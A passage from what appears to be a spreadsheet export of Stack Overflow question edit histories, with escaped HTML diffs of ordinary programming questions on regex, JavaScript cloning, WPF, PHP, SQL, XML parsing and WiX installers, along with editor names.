 &lt;p&gt;&lt;span class="diff-add"&gt; The&lt;/span&gt; outer &lt;code&gt;&lt;span class="diff-add"&gt;div&lt;/span&gt;&lt;/code&gt; has &lt;code&gt;width:100%&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;/p&gt; _x000D_
 &lt;div class="snippet" data-lang="js" data-hide="false" data-console="false" data-babel="false"&gt; _x000D_
  &lt;div class="snippet-code"&gt; _x000D_
   &lt;pre class="snippet-code-html lang-html s-code-block hljs xml"&gt;&lt;code&gt;&lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;div&lt;/span&gt; &lt;span class="hljs-attr"&gt;id&lt;/span&gt;=&lt;span class="hljs-string"&gt;"outer"&lt;/span&gt; &lt;span class="hljs-attr"&gt;style&lt;/span&gt;=&lt;span class="hljs-string"&gt;"width:100%"&lt;/span&gt;&amp;gt;&lt;/span&gt;  _x000D_
  &lt;span class="hljs-tag"&gt;&amp;lt;&lt;span class="hljs-name"&gt;div&lt;/span&gt; &lt;span class="hljs-attr"&gt;id&lt;/span&gt;=&lt;span class="hljs-string"&gt;"inner"&lt;/span&gt;&amp;gt;&lt;/span&gt;Foo foo&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;div&lt;/span&gt;&amp;gt;&lt;/span&gt;_x000D_
&lt;span class="hljs-tag"&gt;&amp;lt;/&lt;span class="hljs-name"&gt;div&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
   &lt;div class="snippet-result"&gt; _x000D_
    &lt;div class="snippet-ctas"&gt; _x000D_
     &lt;button type="button" class="s-btn s-btn__primary"&gt;&lt;span class="icon-play-white _hover"&gt;&lt;/span&gt;&lt;span&gt; Run code snippet&lt;/span&gt;&lt;/button&gt; _x000D_
     &lt;input class="copySnippet s-btn s-btn__filled" type="button" value="Copy snippet to answer" style="display: none;"&gt; _x000D_
     &lt;button type="button" class="s-btn hideResults" style="display: none;"&gt;Hide results&lt;/button&gt; _x000D_
     &lt;div class="popout-code"&gt; _x000D_
      &lt;a class="snippet-expand-link"&gt;Expand snippet&lt;/a&gt; _x000D_
     &lt;/div&gt; _x000D_
    &lt;/div&gt; _x000D_
    &lt;div class="snippet-result-code" style="display: none;"&gt; _x000D_
     &lt;iframe name="sif3" sandbox="allow-forms allow-modals allow-scripts" class="snippet-box-edit snippet-box-result" frameborder="0"&gt;&lt;/iframe&gt; _x000D_
    &lt;/div&gt; _x000D_
   &lt;/div&gt; _x000D_
  &lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;p&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Logz</t>
  </si>
  <si>
    <t>Mosh Feu</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Beside the obvious person to person instant message chat, What else have you used a Jabber server's functionality to enable?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Beside the obvious person to person instant message chat, What else have you used a Jabber server's functionality to enable?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Edit: links to working code to really show it off are particularly useful - and will be more likely to be voted up.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Alister Bulman</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; SVN keyword substition gives is not pretty. E.g.,&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Last updated: $Date$ by $Author$&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; yields&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Last updated: $Date: 2008-09-22 14:38:43 -0400 (Mon, 22 Sep 2008) $ by $Author: cconway $"&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; Does anybody have a Javascript snippet that prettifies things and outputs some HTML? The result should be more like:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Last update: 22 Sep 2008 by cconway&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; P.S. Is there a way to replace "cconway" with a display name?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; [EDIT] Could the people who are down-voting this question please post a comment or answer explaining what's so bad about it? If it's blindingly obvious, answer it and I'll vote you up.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; SVN keyword substition gives is not pretty. E.g.,&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Last updated: $Date$ by $Author$&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; yields&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Last updated: $Date: 2008-09-22 14:38:43 -0400 (Mon, 22 Sep 2008) $ by $Author: cconway $"&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; Does anybody have a Javascript snippet that prettifies things and outputs some HTML? The result should be more like:&lt;/p&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;p&gt; Last update: 22 Sep 2008 by cconway&lt;/p&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;p&gt; P.S. Is there a way to replace "cconway" with a display name?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Qantas 94 Heavy</t>
  </si>
  <si>
    <t>Chris Conway</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've got a function that runs a user generated Regex. However, if the user enters a regex that won't run then it stops and falls over. I've tried wrapping the line in a Try/Catch block but alas nothing happens.&lt;/p&gt; _x000D_
 &lt;p&gt; If it helps, I'm running jQuery but the codo below does not have it as I'm guessing that it's a little more fundamental than that.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"_x000D_
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"&amp;gt;_x000D_
&amp;lt;html&amp;gt;_x000D_
&amp;lt;head&amp;gt;_x000D_
    &amp;lt;title&amp;gt;Regex&amp;lt;/title&amp;gt;_x000D_
_x000D_
    &amp;lt;script type="text/javascript" charset="utf-8"&amp;gt;_x000D_
        var grep = new RegExp('gr[');_x000D_
_x000D_
        try_x000D_
        {_x000D_
            var results = grep.exec('bob went to town');_x000D_
        }_x000D_
        catch (e)_x000D_
        {_x000D_
            //Do nothing?_x000D_
        }_x000D_
_x000D_
        alert('If you can see this then the script kept going');_x000D_
    &amp;lt;/script&amp;gt;_x000D_
&amp;lt;/head&amp;gt;_x000D_
&amp;lt;body&amp;gt;_x000D_
_x000D_
&amp;lt;/body&amp;gt;_x000D_
&amp;lt;/html&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've got a function that runs a user generated Regex. However, if the user enters a regex that won't run then it stops and falls over. I've tried wrapping the line in a Try/Catch block but alas nothing happens.&lt;/p&gt; _x000D_
 &lt;p&gt; If it helps, I'm running jQuery but the codo below does not have it as I'm guessing that it's a little more fundamental than that.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Edit: Yes, I know that I am not escaping the "[", that's intentional and the point of the question. I'm accepting user input and I want to find a way to catch this sort of problem without the application falling flat on it's face.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"_x000D_
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"&amp;gt;_x000D_
&amp;lt;html&amp;gt;_x000D_
&amp;lt;head&amp;gt;_x000D_
    &amp;lt;title&amp;gt;Regex&amp;lt;/title&amp;gt;_x000D_
_x000D_
    &amp;lt;script type="text/javascript" charset="utf-8"&amp;gt;_x000D_
        var grep = new RegExp('gr[');_x000D_
_x000D_
        try_x000D_
        {_x000D_
            var results = grep.exec('bob went to town');_x000D_
        }_x000D_
        catch (e)_x000D_
        {_x000D_
            //Do nothing?_x000D_
        }_x000D_
_x000D_
        alert('If you can see this then the script kept going');_x000D_
    &amp;lt;/script&amp;gt;_x000D_
&amp;lt;/head&amp;gt;_x000D_
&amp;lt;body&amp;gt;_x000D_
_x000D_
&amp;lt;/body&amp;gt;_x000D_
&amp;lt;/html&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Teifion</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; ###Duplicate:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/260098/any-free-wpf-themes"&gt;&lt;span class="diff-delete"&gt;Where can I find free WPF controls and control templates?&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; I am looking for some recommendations on good places to find libraries of controls/templates/styles for WPF. I know about the usual places like Infragistics, but it seems to me that there should be some kind of community effort by now to share nice, clean, well written controls for WPF controls.&lt;/p&gt; _x000D_
 &lt;p&gt; I am not big on the design side, and it would be nice to fill out my personal libraries with some nice examples from people who are better at design.&lt;/p&gt; _x000D_
 &lt;p&gt; Any ideas/recommendations?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am looking for some recommendations on good places to find libraries of controls/templates/styles for WPF. I know about the usual places like Infragistics, but it seems to me that there should be some kind of community effort by now to share nice, clean, well written controls for WPF controls.&lt;/p&gt; _x000D_
 &lt;p&gt; I am not big on the design side, and it would be nice to fill out my personal libraries with some nice examples from people who are better at design.&lt;/p&gt; _x000D_
 &lt;p&gt; Any ideas/recommendations?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>user1228</t>
  </si>
  <si>
    <t>Shimmy Weitzhandler</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; ##See: &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/36432/commenting-code"&gt;&lt;span class="diff-delete"&gt;http://stackoverflow.com/questions/36432/commenting-code&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; What are your best practices for comments. when to use them and what they should contain. Do we even need them ( I think we do )&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What are your best practices for comments. when to use them and what they should contain. Do we even need them ( I think we do )&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Brian G</t>
  </si>
  <si>
    <t>tslocum</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is the most efficient way to clone a JavaScript object? I've seen &lt;code&gt;obj = eval(uneval(o));&lt;/code&gt; being used, but &lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/uneval" rel="nofollow noreferrer"&gt;that's non-standard and only supported by Firefox&lt;/a&gt;.&lt;br&gt;&lt;br&gt; I've done things like &lt;code&gt;obj = JSON.parse(JSON.stringify(o));&lt;/code&gt; but question the efficiency. &lt;br&gt;&lt;br&gt; I've also seen recursive copying functions with various flaws.&lt;span class="diff-delete"&gt;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lt;/span&gt; &lt;br&gt; I'm surprised no canonical solution exists.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is the most efficient way to clone a JavaScript object? I've seen &lt;code&gt;obj = eval(uneval(o));&lt;/code&gt; being used, but &lt;a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/uneval" rel="nofollow noreferrer"&gt;that's non-standard and only supported by Firefox&lt;/a&gt;.&lt;br&gt;&lt;br&gt; I've done things like &lt;code&gt;obj = JSON.parse(JSON.stringify(o));&lt;/code&gt; but question the efficiency. &lt;br&gt;&lt;br&gt; I've also seen recursive copying functions with various flaws. &lt;br&gt; I'm surprised no canonical solution exists.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a generic way, without creating and managing your own CLR host, to take over locating and loading a type if that type is not found?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The following is just an example. In your rush to be the first answer, don't suggest the new add-in framework or the MEF as a solution to my question.&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; An example would be a sample with add-ins. Your app reads a file in that lists the types to use for a particular function. The app attempts to instantiate those types. If they aren't already currently loaded in the appdomain, the method fails. I'm looking for an event I can handle or a component I can provide my own implementation for that will allow me to gracefully handle these situations and provide additional logic for loading these assemblies.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;edit&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; making this a community wiki&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a generic way, without creating and managing your own CLR host, to take over locating and loading a type if that type is not found?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The following is just an example. In your rush to be the first answer, don't suggest the new add-in framework or the MEF as a solution to my question.&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; An example would be a sample with add-ins. Your app reads a file in that lists the types to use for a particular function. The app attempts to instantiate those types. If they aren't already currently loaded in the appdomain, the method fails. I'm looking for an event I can handle or a component I can provide my own implementation for that will allow me to gracefully handle these situations and provide additional logic for loading these assemblies.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm trying to put together a comprehensive regex to validate phone numbers. Ideally it would handle international formats, but it must handle US formats, including the following:&lt;span class="diff-delete"&gt;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lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; 1-234-567-8901&lt;/li&gt; _x000D_
  &lt;li&gt; 1-234-567-8901 x1234&lt;/li&gt; _x000D_
  &lt;li&gt; 1-234-567-8901 ext1234&lt;/li&gt; _x000D_
  &lt;li&gt; 1 (234) 567-8901&lt;/li&gt; _x000D_
  &lt;li&gt; 1.234.567.8901&lt;/li&gt; _x000D_
  &lt;li&gt; 1/234/567/8901&lt;/li&gt; _x000D_
  &lt;li&gt; 12345678901&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I'll answer with my current attempt, but I'm hoping somebody has something better and/or more elegant.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm trying to put together a comprehensive regex to validate phone numbers. Ideally it would handle international formats, but it must handle US formats, including the following:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; 1-234-567-8901&lt;/li&gt; _x000D_
  &lt;li&gt; 1-234-567-8901 x1234&lt;/li&gt; _x000D_
  &lt;li&gt; 1-234-567-8901 ext1234&lt;/li&gt; _x000D_
  &lt;li&gt; 1 (234) 567-8901&lt;/li&gt; _x000D_
  &lt;li&gt; 1.234.567.8901&lt;/li&gt; _x000D_
  &lt;li&gt; 1/234/567/8901&lt;/li&gt; _x000D_
  &lt;li&gt; 12345678901&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I'll answer with my current attempt, but I'm hoping somebody has something better and/or more elegant.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We are using &lt;a href="http://activemq.apache.org/" rel="nofollow noreferrer"&gt;ActiveMQ 5.&lt;span class="diff-delete"&gt;1&lt;/span&gt;&lt;/a&gt; as our implementation of choice and we picked it a while ago. It performs well enough for our use right now. Since its been a while, I was wondering what other Java Message Service implementations are in use and why?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We are using &lt;a href="http://activemq.apache.org/" rel="nofollow noreferrer"&gt;ActiveMQ 5.&lt;span class="diff-add"&gt;2&lt;/span&gt;&lt;/a&gt; as our implementation of choice and we picked it a while ago. It performs well enough for our use right now. Since its been a while, I was wondering what other Java Message Service implementations are in use and why?&lt;span class="diff-add"&gt; Surely there are more than a few.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jay R.</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Whats the available solutions for &lt;code&gt;&lt;span class="diff-delete"&gt;PHP&lt;/span&gt;&lt;/code&gt; to create word document in &lt;code&gt;&lt;span class="diff-delete"&gt;linux&lt;/span&gt;&lt;/code&gt; environment?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Whats the available solutions for &lt;span class="diff-add"&gt;PHP&lt;/span&gt; to create word document in &lt;span class="diff-add"&gt;linux&lt;/span&gt; environment?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Donald Duck</t>
  </si>
  <si>
    <t>Serving Quarantine period</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am trying to install &lt;code&gt;&lt;span class="diff-delete"&gt;PHP&lt;/span&gt;&lt;/code&gt; onto my development box &lt;code&gt;&lt;span class="diff-delete"&gt;(XP SP3 / IIS 5.1)&lt;/span&gt;&lt;/code&gt; I've got &lt;code&gt;&lt;span class="diff-delete"&gt;PHP 5.2.6 stable downloaded (the MSI installer package)&lt;/span&gt;&lt;/code&gt; and I am getting an error "Cannot find httpd.conf". After that the install seems to breeze by quickly (more quickly than I would have expected) and when I try to execute a simple &lt;code&gt;&lt;span class="diff-delete"&gt;PHP&lt;/span&gt;&lt;/code&gt; script from my localhost test directory that I created, I get a slew of missing &lt;code&gt;&lt;span class="diff-delete"&gt;DLL errors&lt;/span&gt;&lt;/code&gt;. I have seen posts out there which indicate that its possible and has been done. I &lt;span class="diff-delete"&gt;don't&lt;/span&gt; see any bug reports for this &lt;code&gt;&lt;span class="diff-delete"&gt;MSI&lt;/span&gt;&lt;/code&gt; at &lt;code&gt;&lt;span class="diff-delete"&gt;PHP.NET support&lt;/span&gt;&lt;/code&gt;. Any ideas?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am trying to install &lt;span class="diff-add"&gt;PHP&lt;/span&gt; onto my development box &lt;span class="diff-add"&gt;(XP SP3 / IIS 5.1)&lt;/span&gt; I've got&lt;span class="diff-add"&gt; PHP 5.2.6 stable downloaded&lt;/span&gt; &lt;span class="diff-add"&gt;(the MSI installer package)&lt;/span&gt; and I am getting an error "Cannot find httpd.conf". After that the install seems to breeze by quickly (more quickly than I would have expected) and when I try to execute a simple &lt;span class="diff-add"&gt;PHP&lt;/span&gt; script from my localhost test directory that I created, I get a slew of missing &lt;span class="diff-add"&gt;DLL errors&lt;/span&gt;. I have seen posts out there which indicate that its possible and has been done. I &lt;span class="diff-add"&gt;dont&lt;/span&gt; see any bug reports for this &lt;span class="diff-add"&gt;MSI&lt;/span&gt; at &lt;span class="diff-add"&gt;PHP.NET support&lt;/span&gt;. Any ideas?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Taptronic</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is it possible to use an attribute of a child to group a query?&lt;/p&gt; _x000D_
 &lt;p&gt; Post.find(:all, :include =&amp;gt; [ :&lt;span class="diff-delete"&gt;author&lt;/span&gt;, :comments ], :group=&amp;gt;'authors.city') does not work.&lt;/p&gt; _x000D_
 &lt;p&gt; However, I am able to use author.city as part of the conditions.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is it possible to use an attribute of a child to group a query?&lt;/p&gt; _x000D_
 &lt;p&gt; Post.find(:all, :include =&amp;gt; [ :&lt;span class="diff-add"&gt;authors&lt;/span&gt;, :comments ], :group=&amp;gt;'authors.city') does not work.&lt;/p&gt; _x000D_
 &lt;p&gt; However, I am able to use author.city as part of the conditions.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>sutee</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I want to call a web service, but I won't know the url till runtime.&lt;/p&gt; _x000D_
 &lt;p&gt; Whats the best way to get the web reference in, without actually committing to a url.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I want to call a web service, but I won't know the url till runtime.&lt;/p&gt; _x000D_
 &lt;p&gt; Whats the best way to get the web reference in, without actually committing to a url.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; What about having 1 client hit the same web service on say 10 different domains?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have two tables, Users and DoctorVisit&lt;/p&gt; _x000D_
 &lt;p&gt; User&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; UserID&lt;/li&gt; _x000D_
  &lt;li&gt; Name&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; DoctorsVisit&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; UserID&lt;/li&gt; _x000D_
  &lt;li&gt; Weight&lt;/li&gt; _x000D_
  &lt;li&gt; Date&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; The doctorVisit table contains all the visits a particular user did to the doctor. The user's weight is recorded per visit.&lt;/p&gt; _x000D_
 &lt;p&gt; Query: Sum up all the Users weight, using the last doctor's visit's numbers. (then divide by number of users to get the average weight)&lt;/p&gt; _x000D_
 &lt;p&gt; Note: some users may have not visited the doctor at all, while others may have visited many times.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have two tables, Users and DoctorVisit&lt;/p&gt; _x000D_
 &lt;p&gt; User&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; UserID&lt;/li&gt; _x000D_
  &lt;li&gt; Name&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; DoctorsVisit&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; UserID&lt;/li&gt; _x000D_
  &lt;li&gt; Weight&lt;/li&gt; _x000D_
  &lt;li&gt; Date&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; The doctorVisit table contains all the visits a particular user did to the doctor. The user's weight is recorded per visit.&lt;/p&gt; _x000D_
 &lt;p&gt; Query: Sum up all the Users weight, using the last doctor's visit's numbers. (then divide by number of users to get the average weight)&lt;/p&gt; _x000D_
 &lt;p&gt; Note: some users may have not visited the doctor at all, while others may have visited many times.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I need the average weight of all users, but using the latest weight.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>AnonymousCow</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I want to programmatically edit file content using windows command line (&lt;a href="http://en.wikipedia.org/wiki/Windows_command_line" rel="nofollow noreferrer"&gt;cmd.exe&lt;/a&gt;). In *nix there is &lt;a href="http://en.wikipedia.org/wiki/Sed" rel="nofollow noreferrer"&gt;sed&lt;/a&gt; for this tasks. Is there any usefull equivalent in windows?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;Edit: I am looking for native command line solution.&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Edit2 (nine month later): By native I meant solution which runs on all windows without installing additional stuff.&lt;/span&gt;&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I want to programmatically edit file content using windows command line (&lt;a href="http://en.wikipedia.org/wiki/Windows_command_line" rel="nofollow noreferrer"&gt;cmd.exe&lt;/a&gt;). In *nix there is &lt;a href="http://en.wikipedia.org/wiki/Sed" rel="nofollow noreferrer"&gt;sed&lt;/a&gt; for this tasks. Is there any usefull equivalent in windows?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;em&gt;Edit: I am looking for native command line solution.&lt;/em&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jakub Å turc</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am attempting to read a large XML document and I wanted to do it in &lt;span class="diff-delete"&gt;chunks&lt;/span&gt; vs &lt;code&gt;&lt;span class="diff-delete"&gt;XmlDocument&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;'s&lt;/span&gt; way of reading the entire file into memory. I know I can use &lt;code&gt;&lt;span class="diff-delete"&gt;XmlTextReader&lt;/span&gt;&lt;/code&gt; to do this but I was wondering if anyone has used SAX for .NET? I know Java &lt;span class="diff-delete"&gt;developers&lt;/span&gt; swear by it and I was wondering if it is worth giving it a try and if so what are the benefits in using it. I am looking for specifics.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am attempting to read a large XML document and I wanted to do it in &lt;span class="diff-add"&gt;chucks&lt;/span&gt; vs &lt;span class="diff-add"&gt;XMLDocument's&lt;/span&gt; way of reading the entire file into memory. I know I can use &lt;span class="diff-add"&gt;XMLTextReader&lt;/span&gt; to do this but I was wondering if anyone has used SAX for .NET? I know Java &lt;span class="diff-add"&gt;deveolpers&lt;/span&gt; swear by it and I was wondering if it is worth giving it a try and if so what are the benefits in using it. I am looking for specifics.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Cheers&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>cgreeno</t>
  </si>
  <si>
    <t>John Saunders</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a wix installer and a single custom action (plus undo and rollback) for it which uses a property from the installer. The custom action has to happen after all the files are on the hard disk. It seems that you need 16 entries in the wxs file for this; eight within the root, like so:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;CustomAction Id="SetForRollbackDo" Execute="immediate" Property="RollbackDo" Value="[MYPROP]"/&amp;gt;_x000D_
&amp;lt;CustomAction Id="RollbackDo" Execute="rollback" BinaryKey="MyDLL" DllEntry="UndoThing" Return="ignore"/&amp;gt;_x000D_
&amp;lt;CustomAction Id="SetForDo" Execute="immediate" Property="Do" Value="[MYPROP]"/&amp;gt;_x000D_
